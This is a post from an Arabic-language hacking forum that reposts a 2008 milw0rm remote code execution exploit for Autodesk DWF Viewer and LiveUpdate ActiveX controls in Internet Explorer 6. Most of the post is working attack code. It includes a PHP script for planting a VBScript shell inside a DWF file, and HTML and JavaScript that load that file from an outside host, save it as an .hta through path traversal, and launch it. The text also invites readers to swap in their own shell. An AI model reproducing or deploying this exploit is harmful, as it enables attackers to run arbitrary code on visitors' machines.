قديم 10-02-2008, 03:17 AM رقم المشاركة : 1 (permalink)
معلومات العضو
SubSEven7II
Supervisor-General

الصورة الرمزية SubSEven7II

إحصائية العضو

الانتساب : Mar 2008
رقم العضوية : 102324
المشاركات : 2,091
بمعدل : 8.17 يومياً


SubSEven7II متصل الآن


افتراضي Autodesk DWF Viewer Control / LiveUpdate Module remote code execution exploit

<!--
Autodesk DWF Viewer Control / LiveUpdate Module remote code execution exploit
by Nine:Situations:Group::bruiser
site: rgod web pages
tested against IE6

tested software: Revit Architecture 2009 sp2
Autodesk Design Review 2009 (which also comes with Revit)


dll settings (both):
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
KillBitSet: False

The first vulnerability is caused due to the CExpressViewerControl class
(AdView.dll v9.0.0.96) which provide the insecure SaveAS() method
which allows to store locally files with arbitrary extension.
The second one is related to the ApplyPatch() one inside the UpdateEngine
class (LiveUpdate16.DLL, 17.2.56 ??... this is a shared one) which allows to launch an arbitrary
executable by the second argument. Note, that the first one, alone, allows
arbitrary code execution. The impact of the second one is limited if you cannot
specify command arguments or launch a file of yours.

The embedded dwf file (located at the url http://retrogod.altervista.org/suntzu.dwf)
has been created modifying an existing one, replacing a .png resource file with
a vbscript shell through the following script (note the PCLZIP_OPT_NO_COMPRESSION flag,
this has been used to preserve the code, note also the dwg files are
essentially zips) :

<?php
//library:
//http://www.phpconcept.net/pclzip/index.en.php#download
include_once('pclzip.lib.php');

$archive = new PclZip('suntzu.dwf');

//modify path
$list = $archive->add("com.autodesk.dwf.ePlot_CD186DAA4322089243B14 0AD3ACE11B7\\A84650EE-74A7-4766-8D0C-CC9EAE8313D3.png", PCLZIP_OPT_NO_COMPRESSION);

if ($list == 0) {
echo "ERROR : ".$archive->errorInfo(true);
}
?>

take a look to suntzu.dwf with an hex-editor...
This exploit launch calc.exe but you can embed your own vbscript shell
and extended shell commands, by using the php code given.
-->
<HTML>
<OBJECT CLASSID="clsid:A662DA7E-CCB7-4743-B71A-D817F6D575DF"
WIDTH="640" HEIGHT="480"
id='CExpressViewerControl' >
<PARAM NAME="Src"
VALUE="http://retrogod.altervista.org/suntzu.dwf">
</OBJECT>
<OBJECT CLASSID='clsid:89EC7921-729B-4116-A819-DF86A4A5776B'
id='UpdateEngine' />
</OBJECT>
<script type="text/javascript">
<!--
strPatchFile = "..\\..\\..\\..\\..\\..\\..\\suntzu.hta";

try
{
CExpressViewerControl.SaveAS (strPatchFile);
}
catch(e)
{
document.write("impossible to save suntzu.hta ...");
}
finally
{
}
strProductCode="whatever" ;

try
{
UpdateEngine.ApplyPatch (strProductCode , strPatchFile);
}
catch(e)
{
document.write("impossible to execute suntzu.hta ...");
}
finally
{
}

-->
</script>

# milw0rm.com [2008-09-30]







التوقيع

رد مع اقتباس
رد

مواقع النشر (المفضلة)



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
طرق مشاهدة الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
devalcms 1.4a XSS / Remote Code Execution Exploit zeoos :: Local Root Exploit :: 0 09-05-2008 07:50 PM
TGS CMS 0.3.2r2 Remote Code Execution Exploit zeoos :: Local Root Exploit :: 0 08-04-2008 12:30 AM
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit zeoos :: Local Root Exploit :: 0 04-01-2008 07:10 PM
Vuln: Retired: Open-Realty 'adodb-perf-module.inc.php' Remote Code Execution Vulnerab HACKERS_3006 :: Local Root Exploit :: 0 02-10-2008 02:40 AM
Vuln: Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerabilit HACKERS_3006 :: Local Root Exploit :: 0 01-28-2008 11:20 PM

Loading...



 


ترتيب الموقع عالمياً
1 2 3 4 5 6 7 8 9 10 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 dvd,arab.dvd4arab.movies,news,arab,idx,cd,vcd,translation,hot,bew,cool,fun المنتدى العام -منتدى الأدب والفنون -مجلة الديفيدي -منتـدي أدم و حــــ ، ـــواء -منتدى الأذكياء -أجندة الديفيدي -المنتدى الاسلامي العام -المكتبة الاٍسلامية -منتدى الإذاعة والتليفزيون الإسلامى منتدى الأغاني العربية -منتدى روابط عشّـاق المطربيـن -منتدى الأغانى العالمية -منتدى المسلسلات العالمية والعربية -منتدى الفنون والمناقشات السينمائية- منتدى ترجمة الأفلام والمسلسلات منتدى بوليوود(السينما الهندية)-منتدى عالم الأنيمى والكارتون -منتدى تحميل الأفلام العام -منتدى تحميل الأفلامTorrent-منتدى تحميل الأفلام بالروابط المباشرة -منتدى تبادل الافلام منتـدى البرامج والشروحات السينمائية -المنتدى الطبي -المنتدي العلمي العام -المنتدى الهندسي -منتدي العلوم الفضائية و الكونية والفلكية منتـــدى التجـــارييــن منتدى الطبيعة والحياة البرية منتدي المالتي ميديا العام - منتدي الصور والجرافيكس الخاص بالمصارعه الحرة -منتدى روابط المصارعين -منتدي الـ BitTorrent للمصارعة الحره -منتدي المناقشات -إستراحة مصارعة الدي في دي منتدي كمال الاجسام وبناء العضلات -منتدي الرياضة العربية والعالمية -منتدى الكرة المصري -منتدي بطولات الكرة الاوروبية Uefa-منتدى الملتيميديا العام -منتدى الرياضات الاخرى منتدى الهوايات العام -منتدى أسماك وطيور الزينة -منتدى هواة تربية الحيوانات الأليفة -منتدى عالم السيارات -منتدى ألعاب الكمبيوتر -منتدى تحميل الالعاب للكمبيوتر منتدى Consoles-PS2/3-XBoX360-Wii-منتدى تبادل الألعاب - منتدى البرامج -منتدى برامج الحمايه والفايروول -منتدى الهاكر -مـــنتدى عــالم المــاسنجــر وخبــاياه -منتدى خاص بشروح البرامج -منتدى الصيانة وخدمة الأعضاء منتدى الشبكات - منتدى خاص بالبرمجة -منتدى تطوير المواقع و المنتديات -منتدى الكتب الإلكترونية -منتدى المالتيميديا و الجرافيكس العام - منتدى الجوالات العام -منتدى النوكيا المنتدي الفضائي العام -منتدى القنوات والشفرات -منتدي كروت الساتلايت -منتدى أجهزة الستلايت -منتدى الشيرنج العام -منتدى العرض -منتدى الطلب - منتدى الوظائف -منتدى الاستشـارات القـانونية -البورصة المصريةلقطات فيديو مضحكة - عالم محمد فؤاد - شبكة حالا الترفيهية - افلام مجانا - شاهد افلام مجانا - العاب فلاش - منتدى سحر - اغانى مجانا - اغانى - دردشة - العاب فلاش - عيني عينك - Video -خلفيات شاشة - افلام - شات - دردشة - دردشة - دردشه - شاتالمنتديات العامــــــــــة منتدياتنا الاسلامية رمضان 2006 دروس مفيدة سلسلة دروس ايمانية منتديات الدى فى دى العامة قوميتنا ... كل الكلام الجاد جدا التعارف والترحيب والتهانى اخر اخبار السياسة والاقتصاد والمجتمع أحبـــــــــــك ركن الترفيه والتسالى منتديات دى فى دى للافـــــلام Movies - Films قسم الافلام العربية قسم الافلام الاجنبيه طلبات ترجمة الافلام الاجنبيه مسرحيات دى فى دى العربى قسم تحميل الأفلام العربية بروابط مباشرة قسم الأفلام الاجنبية بروابط مباشرة قسم افلام التورنت Torrent Movies كل الاغانى العربى والاجنبى والكليبات قسم الالبومات والاغانى والكليبات قسم الاغانى الشعبى اغانى الزمن الجميل ( اغانى زمااان ) انفرادات قسم الالبومات والاغانى الاجنبى اخر الاخبار معرض الصور والخلفيات صور عجيبة وغريبة صور الفنانين والمشاهير خلفيات الكمبيوتر ومناظر طبيعية قسم صور السيارات واخبارها منتدى كل الاقســـام قسم كل البرامج العامة قسم برامج الصوت والفيديو والجرافيكس قسم الألعـــاب قسم تطوير المواقع والمنتديات قسم الستالايت قسم الخيال والغرائب واللقطات المضحكة قسم الجوالات قسم الجوالات العام قسم برامج الجوالات قسم ثيمات ونغمات الرياضة من كل مكان كرة القدم ... كل الاخبار والاحداث واهم المواضيع مكتبة الميديا والوسائط قسم رياضة المصارعة كل الرياضات المختلفة قسم شباب وبنات كل شئون الفتيات مواقف الجامعة والمدرسة قسم مواهب الاعضاء الاقسام الاادارية فريق عمل الدى فى دى العربى من الأعضاء قسم المواضيع المحذوفة اغانى شعبية شعبى تحميل أفلام عربية جديدة مجانا تحميل أفلام اجنبية مجانا مواضيع محذوفة العاب جوال موبايل ثيمات نغمات للجوال تحميل مجاناموقع الدى فى دى العربى لتحميل أفلام مجانا افلام عربية واجنبية كل الجديد دائما تحميل برامج برنامج مجانا صور فناننين ومطربين


 


ملاحظة : المواضيع الموجودة بالمنتدى ليس بالضرورة تعبر عن رأي إدارة منظمة الأختراق العالمية بل تعبر عن كاتبها

الساعة الآن 06:21 PM.
Powered by: vBulletin Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
مـنـتـديـات مـنـظـمـة الاخـتــراق الـعـالـمـيــه

بدعم وتطوير شركة intercative